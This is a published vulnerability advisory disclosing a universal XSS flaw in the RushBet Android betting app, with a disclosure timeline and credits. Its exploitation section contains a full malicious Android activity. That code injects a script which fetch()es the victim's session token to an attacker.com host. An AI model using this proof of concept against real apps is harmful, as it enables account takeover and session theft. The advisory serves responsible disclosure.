RushBet 2022.23.1-b490616d - Universal XSS

Summary

NameRushBet 2022.23.1-b490616d - UXSS
Code name
ProductRushBet
Affected versionsVersion 2022.23.1-b490616d
StatePublic
Release date2023-01-10

Vulnerability

KindUniversal XSS
Rule
RemoteYes
CVSSv3.1 VectorCVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N
CVSSv3.1 Base Score6.0
Exploit availableYes
CVE ID(s)

Description

RushBet version 2022.23.1-b490616d allows a remote attacker to steal customer accounts via use of a malicious application. This is possible because the application exposes an activity and does not properly validate the data it receives.

Vulnerability

This vulnerability occurs because the application exposes an activity and does not properly validate the data it receives.

Exploitation

To exploit this vulnerability, the victim must have a malicious application installed with activity like the following:

MainActivity.java

package com.example.badapp; import androidx.appcompat.app.AppCompatActivity; import android.content.Intent; import android.os.Handler; import android.os.Bundle; import android.net.Uri; public class MainActivity extends AppCompatActivity { @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); Intent intent = new Intent("android.intent.action.VIEW"); intent.setClassName("com.rush.co.rb","com.sugarhouse.casino.MainActivity"); intent.setData(Uri.parse("https://rushbet.co/")); startActivity(intent); new Handler().postDelayed(() -> {
            intent.setAction("Action.EvaluateScript");
            intent.putExtra("KeyScript","fetch('https://attacker.com/sessionID/'+JSON.parse(sessionStorage.getItem('session-COP')).value);");
            startActivity(intent);
        }, 30000);
    }
}

Thus, when the victim opens the malicious app, the exploit will be executed, thus hacking his account.

Evidence of exploitation

PII-Account-Takeover-Rushbet

Our security policy

We have reserved the CVE-2022-4235 to refer to this issue from now on.

System Information

  • Version: RushBet 2022.23.1-b490616d

  • Operating System: GNU/Linux

Mitigation

An updated version of RushBet is available at the vendor page.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

References

Vendor page https://www.rushbet.co

Timeline

Time-lapse-logo

2022-11-29

Vulnerability discovered.

Time-lapse-logo

2022-11-30

Vendor contacted.

Time-lapse-logo

2022-12-03

Vendor replied acknowledging the report.

Time-lapse-logo

2022-12-03

Vendor Confirmed the vulnerability.

Time-lapse-logo

2022-12-14

Vulnerability patched.

Time-lapse-logo

2023-01-10

Public Disclosure.

Fluid Logo Footer

Hacking software for over 20 years

Fluid Attacks tests applications and other systems, covering all software development stages. Our team assists clients in quickly identifying and managing vulnerabilities to reduce the risk of incidents and deploy secure technology.

Copyright © 0 Fluid Attacks. We hack your software. All rights reserved.